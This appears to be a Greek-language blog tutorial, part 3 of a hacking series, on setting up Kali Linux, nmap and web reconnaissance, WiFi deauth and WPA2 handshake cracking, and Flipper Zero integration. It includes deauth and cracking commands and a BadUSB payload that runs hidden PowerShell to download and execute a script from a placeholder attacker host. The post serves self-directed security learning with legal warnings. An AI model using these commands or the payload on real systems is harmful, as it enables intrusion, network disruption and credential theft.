Μενού
Σχετικά Υπηρεσίες Πορεία Συνεργαστείτε μαζί μου
Linux terminal with code
Ασφάλεια Μαρ 7, 2026 • 25 λεπτά ανάγνωσης

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Κοινοποίηση:
Lee Foropoulos

Lee Foropoulos

25 λεπτά ανάγνωσης

Η Πορεία του Hacker: Σειρά 5 Μερών

Μέρος 1: ΕισαγωγήΜέρος 2: Κατάκτηση του FlipperΜέρος 3: Βασικά του KaliΜέρος 4: ΕκμετάλλευσηΜέρος 5: Ο Πλήρης Έλεγχος

Στα Μέρη 1 και 2, κλωνοποιήσατε κάρτες, αναλύσατε ραδιοσυχνότητες και καταλάβατε γιατί η περισσότερη "ασφάλεια" είναι θέατρο. Είδατε τα τρωτά σημεία από έξω. Τώρα μπαίνετε μέσα και τα βλέπετε από τη σκοπιά του επιτιθέμενου.

Το Kali Linux είναι η βιομηχανική πρότυπη διανομή για penetration testing. Έρχεται προεγκατεστημένο με πάνω από 600 εργαλεία ασφαλείας. Αυτό μπορεί να φαίνεται συντριπτικό. Τα περισσότερα tutorials σε ρίχνουν στα βαθιά με εντολές που δεν καταλαβαίνεις και χωρίς πλαίσιο για το γιατί έχουν σημασία.

Εδώ κάνουμε τα πράγματα διαφορετικά. Μέχρι το τέλος αυτού του άρθρου, θα έχετε ένα λειτουργικό εργαστήριο, θα κατανοείτε την αναγνώριση δικτύου σε θεμελιώδες επίπεδο και θα έχετε καταγράψει το δικό σας WiFi handshake. Κάθε βήμα χτίζει πάνω στο προηγούμενο.

Τα περισσότερα tutorials σε ρίχνουν στα βαθιά με εντολές που δεν καταλαβαίνεις και χωρίς πλαίσιο για το γιατί έχουν σημασία. Κάθε βήμα εδώ χτίζει πάνω στο προηγούμενο.

Μέρος 1: Χτίζοντας το Εργαστήριό σας

Οι επαγγελματίες penetration testers δεν τρέχουν Kali στο κύριο μηχάνημά τους. Χρησιμοποιούν απομονωμένα περιβάλλοντα που μπορούν να επαναφερθούν, να αποθηκευτούν ως snapshot και να καταστραφούν χωρίς να επηρεάσουν το κύριο σύστημα. Θα κάνετε το ίδιο.

Επιλογή Α: Εικονική Μηχανή (Συνιστάται για Εκμάθηση)

Μια εικονική μηχανή σας δίνει το ασφαλέστερο περιβάλλον εκμάθησης. Μπορείτε να αποθηκεύσετε snapshots της προόδου σας, να κάνετε λάθη και να επαναφέρετε αμέσως.

Τι Θα Χρειαστείτε

  • Κεντρικό μηχάνημα: 16GB+ RAM, 50GB+ ελεύθερο χώρο δίσκου, σύγχρονο CPU με υποστήριξη virtualization
  • Λογισμικό virtualization: VirtualBox (δωρεάν) ή VMware Workstation Player (δωρεάν για προσωπική χρήση)
  • Kali Linux: Επίσημο προκατασκευασμένο VM από kali.org

Έργο: Εγκατάσταση Kali VM

Χρόνος: 30-45 λεπτά

Βήματα:

  1. Κατεβάστε το Kali VM image για τον hypervisor σας (VirtualBox ή VMware)
  2. Εξάγετε το αρχείο που κατεβάσατε (συνιστάται 7-Zip για Windows)
  3. Εισάγετε το VM στον hypervisor σας
  4. Ρυθμίστε πόρους: τουλάχιστον 4GB RAM (συνιστάται 8GB), 2+ πυρήνες CPU
  5. Ενεργοποιήστε τον network adapter σε "Bridged" mode για πλήρη πρόσβαση στο δίκτυο
  6. Εκκινήστε το VM και συνδεθείτε με τα προεπιλεγμένα credentials: kali / kali
  7. Ανοίξτε τερματικό και τρέξτε: sudo apt update && sudo apt full-upgrade -y
  8. Δημιουργήστε ένα snapshot με όνομα "Fresh Install" για εύκολη ανάκτηση

Επαλήθευση επιτυχίας: Μπορείτε να ανοίξετε τερματικό, να τρέξετε whoami και να δείτε kali.

Επιλογή Β: Αποκλειστικό Hardware (Για Σοβαρή Εξάσκηση)

Μόλις νιώσετε άνετα με το Kali, το αποκλειστικό hardware αφαιρεί τo overhead του VM και επιτρέπει πλήρη πρόσβαση στο hardware, κάτι που είναι απαραίτητο για ασύρματο testing.

Προτάσεις Hardware

Οικονομική επιλογήΜεταχειρισμένο ThinkPad X230/T430 ($100-150), Intel WiFi αντικατεστημένο με Atheros AR9285
Σύγχρονη επιλογήFramework Laptop με Linux-compatible WiFi module
Αποκλειστικός αισθητήραςRaspberry Pi 5 4GB με εξωτερικό Alfa AWUS036ACH adapter

Προς το παρόν, ένα VM είναι τέλειο. Το αποκλειστικό hardware γίνεται σημαντικό όταν χρειάζεστε monitor mode για ασύρματο testing (καλύπτεται αργότερα σε αυτό το άρθρο).

Επιλογή Γ: Live USB (Μηδενική Αποθήκευση)

Ένα live USB τρέχει Kali απευθείας χωρίς εγκατάσταση. Τα πάντα εξαφανίζονται όταν κλείσετε τη συσκευή. Χρήσιμο για testing σε διαφορετικό hardware, αλλά θα χάνετε τη δουλειά σας κάθε συνεδρία εκτός αν δημιουργήσετε ένα persistent partition.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

Το dd Καταστρέφει Δεδομένα

Η εντολή dd γράφει απευθείας στον δίσκο χωρίς επιβεβαίωση. Ελέγξτε τριπλά το όνομα της συσκευής. Αν γράψετε στη λάθος συσκευή, θα σβήσει τα πάντα σε εκείνον τον δίσκο.

Kali Linux terminal with security tools running
Ένα σωστά ρυθμισμένο περιβάλλον Kali Linux είναι η βάση κάθε επαγγελματικού penetration test.

Μέρος 2: Η Νοοτροπία του Terminal

Πριν αγγίξουμε εργαλεία ασφαλείας, πρέπει να νιώθετε άνετα στο terminal. Αυτό δεν είναι προαιρετικό. Το GUI υπάρχει στο Kali, αλλά η πραγματική δουλειά γίνεται στη γραμμή εντολών.

Βασική Πλοήγηση

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Κλιμάκωση Δικαιωμάτων

Πολλά εργαλεία ασφαλείας απαιτούν root πρόσβαση. Στο Kali, το sudo σας δίνει προσωρινά root δικαιώματα.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root με Υπευθυνότητα

Η εκτέλεση ως root σημαίνει μηδενικά δίχτυα ασφαλείας. Ένα τυπογραφικό λάθος όπως rm -rf / θα καταστρέψει τα πάντα. Το σύγχρονο Kali αποτρέπει αυτή τη συγκεκριμένη εντολή, αλλά η αρχή παραμένει: κατανοήστε τι τρέχετε πριν το τρέξετε.

Διαχείριση Διεργασιών

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Εντολές Δικτύου

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Έργο: Εξοικείωση με το Terminal

Χρόνος: 15 λεπτά

Εργασίες:

  1. Βρείτε τη διεύθυνση IP σας στο τοπικό δίκτυο χρησιμοποιώντας ip a
  2. Εντοπίστε το default gateway σας χρησιμοποιώντας ip route
  3. Κάντε ping στο gateway σας για να επιβεβαιώσετε τη συνδεσιμότητα
  4. Δείτε όλα τα αρχεία στο /etc ταξινομημένα κατά χρόνο τροποποίησης: ls -lt /etc | head
  5. Διαβάστε τις πρώτες 50 γραμμές του /etc/passwd: head -n 50 /etc/passwd

Στόχος: Πρέπει να μπορείτε να πλοηγείστε, να ελέγχετε την κατάσταση δικτύου και να διαβάζετε αρχεία χωρίς να σκέφτεστε.

Μέρος 3: Αναγνώριση Δικτύου με Nmap

Το Nmap (Network Mapper) είναι το πιο σημαντικό εργαλείο που θα μάθετε. Ανακαλύπτει hosts, αναγνωρίζει υπηρεσίες, εντοπίζει λειτουργικά συστήματα και χαρτογραφεί την τοπολογία δικτύου. Όλα τα υπόλοιπα χτίζονται πάνω στα αποτελέσματα του nmap.

Η Πρώτη σας Σάρωση

Ας σαρώσουμε το δικό σας δίκτυο. Πρώτα, εντοπίστε το εύρος του δικτύου σας:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Θα δείτε αποτέλεσμα σαν αυτό:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Αυτή η πρώτη σάρωση σας λέει: "Αυτές οι συσκευές υπάρχουν στο δίκτυό μου." Τώρα ας κάνουμε πιο βαθιές ερωτήσεις.

Ανίχνευση Υπηρεσιών

Μόλις ξέρετε ποιοι hosts υπάρχουν, θέλετε να μάθετε ποιες υπηρεσίες τρέχουν.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Συνηθισμένο αποτέλεσμα:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Ανίχνευση Λειτουργικού Συστήματος

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Κατανόηση Καταστάσεων Θυρών

Το Nmap αναφέρει θύρες σε διάφορες καταστάσεις:

  • open - Εφαρμογή που δέχεται ενεργά συνδέσεις. Αυτό ψάχνουν οι επιτιθέμενοι.
  • closed - Η θύρα είναι προσβάσιμη αλλά καμία εφαρμογή δεν ακούει. Ο host λειτουργεί αλλά δεν υπάρχει τίποτα εκεί.
  • filtered - Firewall ή φίλτρο μπλοκάρει τον έλεγχο. Δεν μπορεί να προσδιοριστεί αν είναι ανοιχτή ή κλειστή.
  • unfiltered - Η θύρα είναι προσβάσιμη αλλά το nmap δεν μπορεί να κρίνει αν είναι ανοιχτή ή κλειστή.

Τύποι Σάρωσης και Αόρατη Προσέγγιση

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

Το NSE επεκτείνει το nmap με εξειδικευμένα scripts για ανίχνευση ευπαθειών, απαρίθμηση υπηρεσιών και πολλά ακόμη.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Έργο: Χαρτογραφήστε το Δίκτυό σας

Χρόνος: 30 λεπτά

Προαπαιτούμενα: Γνωρίζετε το εύρος του δικτύου σας από ip a

  1. Ανακαλύψτε όλους τους hosts: sudo nmap -sn YOUR_NETWORK/24
  2. Καταγράψτε τους hosts που ανακαλύφθηκαν και τις MAC διευθύνσεις τους
  3. Επιλέξτε τον router σας (συνήθως .1) και τρέξτε: sudo nmap -sV -sC YOUR_ROUTER
  4. Εντοπίστε όλες τις ανοιχτές θύρες και υπηρεσίες στον router σας
  5. Τρέξτε sudo nmap -A YOUR_COMPUTER για να δείτε τι εκθέτει το δικό σας μηχάνημα

Τεκμηρίωση: Δημιουργήστε ένα αρχείο κειμένου που καταγράφει κάθε συσκευή, τη διεύθυνση IP της, τη MAC και τις υπηρεσίες. Αυτός είναι ο χάρτης του δικτύου σας.

Σαρώνετε Μόνο Δίκτυα που σας Ανήκουν

Η σάρωση δικτύων χωρίς εξουσιοδότηση είναι παράνομη στις περισσότερες δικαιοδοσίες. Ακόμα και μια απλή σάρωση nmap μπορεί να θεωρηθεί μη εξουσιοδοτημένη πρόσβαση. Μείνετε στο δικό σας δίκτυο, τον δικό σας εξοπλισμό και δίκτυα όπου έχετε ρητή γραπτή άδεια.

Μέρος 4: Αναγνώριση Web

Η σάρωση nmap σας πιθανότατα βρήκε HTTP υπηρεσίες (θύρες 80, 443, 8080). Ας κατανοήσουμε τι τρέχει εκεί.

Whatweb: Γρήγορη Αναγνώριση Υπηρεσίας

bash# Identify web technologies
whatweb http://192.168.1.1

Παράδειγμα αποτελέσματος:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: Σαρωτής Ευπαθειών Web

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Απαρίθμηση Καταλόγων: Τι Κρύβεται;

Οι web servers συχνά έχουν καταλόγους που δεν συνδέονται από την κύρια σελίδα: πίνακες διαχείρισης, αρχεία ρυθμίσεων, αρχεία backup.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Συνηθισμένα ευρήματα:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Τοποθεσία Wordlists

Το Kali περιλαμβάνει εκτεταμένες wordlists στο /usr/share/wordlists/. Οι πιο συνηθισμένοι κατάλογοι: dirb/, dirbuster/, rockyou.txt (κωδικοί πρόσβασης), και seclists/ (ολοκληρωμένη συλλογή).

Έργο: Ελέγξτε το Web Interface του Router σας

Χρόνος: 20 λεπτά

  1. Τρέξτε whatweb http://YOUR_ROUTER_IP για να αναγνωρίσετε τον server
  2. Τρέξτε nikto -h http://YOUR_ROUTER_IP για να ελέγξετε για ευπάθειες
  3. Τρέξτε gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. Επισκεφτείτε τυχόν ανακαλυφθέντες καταλόγους στον browser
  5. Σημειώστε τυχόν πίνακες διαχείρισης, αριθμούς εκδόσεων ή ενδιαφέροντα ευρήματα

Συνηθισμένο εύρημα: Σελίδες διαχείρισης router εκτεθειμένες με προεπιλεγμένα credentials.

Server room with network infrastructure
Η αναγνώριση δικτύου αποκαλύπτει πλήρη τοπολογία του περιβάλλοντος-στόχου, από routers μέχρι κρυφές υπηρεσίες.

Μέρος 5: Ασύρματη Αναγνώριση

Εδώ τα πράγματα γίνονται ενδιαφέροντα. Τα δίκτυα WiFi εκπέμπουν συνεχώς, και με τα σωστά εργαλεία, μπορείτε να καταγράψετε handshakes αυθεντικοποίησης: την κρυπτογραφημένη ανταλλαγή που συμβαίνει όταν μια συσκευή συνδέεται.

Απαιτήσεις Hardware

Το ενσωματωμένο WiFi σας πιθανότατα δεν θα δουλέψει γι' αυτό. Χρειάζεστε έναν adapter που υποστηρίζει monitor mode και packet injection. Συνιστάται: Alfa AWUS036ACH ($50) ή Alfa AWUS036ACM ($45). Αυτά δουλεύουν αμέσως με το Kali.

Κατανόηση του Monitor Mode

Η κανονική λειτουργία WiFi ("managed mode") λαμβάνει μόνο πακέτα που απευθύνονται στη συσκευή σας. Το monitor mode καταγράφει όλα τα πακέτα στην εμβέλεια, την κίνηση κάθε συσκευής στο κανάλι.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Σάρωση για Δίκτυα

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

Αυτό που βλέπετε είναι κάθε δίκτυο WiFi σε εμβέλεια, τις ρυθμίσεις ασφαλείας τους, και συχνά τις συσκευές που είναι συνδεδεμένες σε αυτά. Αυτό βλέπει ένας war driver όταν σαρώνει γειτονιές.

Καταγραφή Handshake

Όταν μια συσκευή συνδέεται σε δίκτυο WPA2, γίνεται ένα four-way handshake. Αν καταγράψετε αυτό το handshake, μπορείτε να προσπαθήσετε να σπάσετε τον κωδικό offline.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Όταν καταγράψετε ένα handshake, το airodump-ng δείχνει [ WPA handshake: XX:XX:XX:XX:XX:XX ] στην πάνω δεξιά γωνία.

Οι Επιθέσεις Deauth Είναι Παράνομες

Η αποστολή πακέτων deauthentication σε δίκτυα που δεν σας ανήκουν είναι ομοσπονδιακό αδίκημα βάσει του Computer Fraud and Abuse Act (στις ΗΠΑ) και παρόμοιων νόμων αλλού. Δοκιμάζετε μόνο στο δικό σας δίκτυο. Ο σκοπός είναι να κατανοήσετε την ευπάθεια, όχι να επιτεθείτε σε άλλους.

Σπάσιμο του Handshake

Με ένα καταγεγραμμένο handshake, μπορείτε να προσπαθήσετε να σπάσετε τον κωδικό offline χρησιμοποιώντας μια wordlist:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Πραγματικοί κωδικοί πρόσβασης από πραγματικές παραβιάσεις δεδομένων περιλαμβάνονται στο rockyou.txt, την προεπιλεγμένη wordlist που χρησιμοποιείται για το σπάσιμο WiFi handshakes.

Πραγματικότητα Ισχύος Κωδικών

Το rockyou.txt περιέχει 14+ εκατομμύρια κωδικούς πρόσβασης από πραγματικές παραβιάσεις δεδομένων. Αν ο κωδικός WiFi σας είναι "password123" ή "summer2024" ή το όνομα του σκύλου σας, μπορεί να σπάσει σε δευτερόλεπτα. Ένας τυχαίος κωδικός 12+ χαρακτήρων θα χρειαζόταν εκατομμύρια χρόνια για brute-force.

Έργο: Δοκιμάστε την Ασφάλεια του WiFi σας

Χρόνος: 45 λεπτά

Προαπαιτούμενα: Εξωτερικός WiFi adapter με υποστήριξη monitor mode

  1. Ενεργοποιήστε monitor mode: sudo airmon-ng start wlan0
  2. Σαρώστε για δίκτυα: sudo airodump-ng wlan0mon
  3. Σημειώστε το κανάλι και BSSID του δικού σας δικτύου
  4. Καταγράψτε στο κανάλι σας: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. Επανασυνδέστε μια συσκευή στο WiFi σας (ή χρησιμοποιήστε deauth στο ΔΙΚΟ ΣΑΣ δίκτυο)
  6. Επιβεβαιώστε τη λήψη του handshake
  7. Δοκιμάστε κατά του rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Αποτέλεσμα: Αν βρέθηκε ο κωδικός σας, αλλάξτε τον αμέσως σε κάτι τυχαίο και μεγάλο (20+ χαρακτήρες).

Μέρος 6: Σύνδεση του Flipper Zero σας

Θυμάστε όλες εκείνες τις καταγραφές από το Μέρος 2; Ας τις ενσωματώσουμε στη ροή εργασίας σας με το Kali.

Μεταφορά Αρχείων

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

Ανάλυση NFC Dumps

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Ανάλυση Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

Ανάπτυξη BadUSB

Δημιουργήστε BadUSB payloads στο Kali, δοκιμάστε τα στο Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

Τα BadUSB Payloads Είναι Ισχυρά

Αυτά τα scripts εκτελούνται αυτόματα όταν συνδεθούν. Ένα κακόβουλο payload θα μπορούσε να εγκαταστήσει backdoors, να κλέψει credentials ή να καταστρέψει δεδομένα σε δευτερόλεπτα. Χρησιμοποιείτε μόνο στα δικά σας μηχανήματα για testing. Μην αφήνετε ποτέ το Flipper σας κάπου που κάποιος άλλος μπορεί να το συνδέσει.

Μέρος 7: Τεκμηρίωση και Ροή Εργασίας

Οι επαγγελματίες penetration testers δεν τρέχουν απλά εργαλεία. Τεκμηριώνουν τα πάντα. Η καλή τεκμηρίωση ξεχωρίζει τους ερασιτέχνες από τους επαγγελματίες.

Καταγραφή Σημειώσεων με CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Αποθήκευση Αποτελεσμάτων Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Καταγραφή Συνεδρίας

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

Η Πορεία του Hacker

Μια σειρά 5 μερών που σας μεταφέρει από περίεργους σε ικανούς.

Μέρος 1: Εισαγωγή Μέρος 2: Κατάκτηση του Flipper Μέρος 3: Βασικά του Kali ✓ Μέρος 4: Εκμετάλλευση Μέρος 5: Πλήρης Έλεγχος

Λίστα Ελέγχου Μέρους 3

☐ Εγκατάσταση Εργαστηρίου: Kali VM σε λειτουργία, ενημερωμένο, snapshot αποθηκευμένο

☐ Terminal: Άνετα με πλοήγηση, δικαιώματα, έλεγχο διεργασιών

☐ Nmap: Δίκτυο χαρτογραφημένο, υπηρεσίες αναγνωρισμένες, router σαρωμένος

☐ Web Recon: Web interface router αναλυμένο με whatweb/nikto

☐ Ασύρματα: Monitor mode ενεργοποιημένο, δίκτυα σαρωμένα

☐ Handshake: Δικό σας WiFi handshake καταγεγραμμένο και δοκιμασμένο

☐ Flipper: Αρχεία μεταφερμένα, ροή εργασίας κατανοητή

☐ Τεκμηρίωση: Σημειώσεις οργανωμένες, σαρώσεις αποθηκευμένες

Πλάνο Δράσης Βασικών Kali 0/6

Τι Ακολουθεί

Χτίσατε το εργαστήριό σας και μάθατε τη φάση αναγνώρισης. Μπορείτε να ανακαλύψετε hosts, να αναγνωρίσετε υπηρεσίες και να καταγράψετε ασύρματα handshakes. Κατανοείτε τι βλέπουν οι επιτιθέμενοι όταν κοιτάνε ένα δίκτυο.

Στο Μέρος 4, περνάμε από την αναγνώριση στην εκμετάλλευση. Θα μάθετε:

  • Metasploit Framework, το ελβετικό σουγιά της εκμετάλλευσης
  • Κοινές ροές εργασίας εκμετάλλευσης ευπαθειών
  • Τεχνικές post-exploitation: τι συμβαίνει μετά την αρχική πρόσβαση
  • Κλιμάκωση δικαιωμάτων: από απλός χρήστης σε διαχειριστή
  • Pivoting: χρήση ενός παραβιασμένου συστήματος για επίθεση σε άλλα

Η αναγνώριση σας λέει πού είναι οι πόρτες. Η εκμετάλλευση σας μαθαίνει πώς να τις ανοίγετε.

Χαρτογραφήσατε το έδαφος. Τώρα μαθαίνετε να πλοηγείστε σε αυτό. Το Μέρος 4 σας μεταφέρει από παρατηρητή σε χειριστή.

Τα λέμε στο Μέρος 4.

How was this article?

Κοινοποίηση

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Mi chasete kanena arthro

Lavetai eidopoiisi otan dimosieuontai nea arthra. Den apaiteitai email.

Tha deite ena banner sto site otan yparxei neo arthro, syn mia eidopoiisi programmatismou an to epitrepsete.

Mono eidopoiiseis programmatos periigisis. Choris spam.